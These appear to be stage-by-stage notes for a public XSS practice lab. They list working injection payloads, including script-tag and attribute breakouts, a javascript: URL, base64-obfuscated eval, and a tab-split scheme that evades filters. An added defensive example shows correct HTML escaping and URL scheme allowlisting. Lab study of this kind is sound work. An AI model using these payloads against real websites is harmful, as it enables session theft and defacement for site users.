XSS Probing
Lab URL: https://xss-quiz.int21h.jp/
stage2
"><script>alert(document.domain)</script>
stage3
Just inject through the Select element's option
Japan</option><script>alert(document.domain);</script>
stage4
Change the input's attributes:
"><script>alert(document.domain);</script>
stage5
The length is limited
Change the length
"><script>alert(document.domain);</script>
stage6
Input is automatically converted to ISO 8859-1 character entities, e.g. > is displayed as its entity name &gt;
" onmouseover=" alert(document.domain);
stage7
Add
" onmouseover= alert(document.domain)
stage8
Done through a URL
javascript:alert(document.domain);
stage9
Add to the span tag
onclick="alert(document.domain)"
stage10
Encode part of the content with base64
"><script>eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs='))</script>
Note: base64 is a reversible encoding
stage11
Embed a special character
"><a href="javascr	ipt:alert(document.domain);">xss</a>
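The defensive side of stages 6, 8 and 11, as an added example that is not part of the original notes: it shows why entity-encoding only angle brackets leaves a quoted attribute open, and why a link target should be checked with a URL parser rather than a string match. All function names and the example.invalid base URL are hypothetical.

```javascript
'use strict';
// Added example, not from the original notes. All names here are hypothetical.

// Encoder for HTML text and *quoted* attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// What stage 6 is described as doing: only angle brackets become entities.
function escapeAnglesOnly(s) {
  return String(s).replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Render a value into a double-quoted attribute using the given encoder.
// Always quote attributes: no entity encoder protects an unquoted one (stage 7).
function renderInput(value, encoder) {
  return '<input type="text" value="' + encoder(value) + '">';
}

// Naive string check on a link target, shown for comparison only.
function naiveHrefFilter(input) {
  return !String(input).toLowerCase().startsWith('javascript:');
}

// Parse first, then allowlist the scheme. The WHATWG URL parser removes
// ASCII tab and newline characters, as browsers do, so the stage 11 value
// normalises to the javascript: scheme and is rejected.
function safeHref(input, base = 'https://example.invalid/') {
  let url;
  try {
    url = new URL(String(input), base);
  } catch {
    return null; // unparseable input is rejected
  }
  return url.protocol === 'http:' || url.protocol === 'https:' ? url.href : null;
}

// Inputs taken from the stage 6, 8 and 11 lines of the notes.
const stage6 = '" onmouseover=" alert(document.domain);';
const stage8 = 'javascript:alert(document.domain);';
const stage11 = 'javascr\tipt:alert(document.domain);';

console.log(renderInput(stage6, escapeAnglesOnly)); // quote survives, attribute is closed early
console.log(renderInput(stage6, escapeHtml));       // quote encoded, value stays inside the attribute
console.log(naiveHrefFilter(stage11), safeHref(stage11), safeHref(stage8), safeHref('/profile'));
```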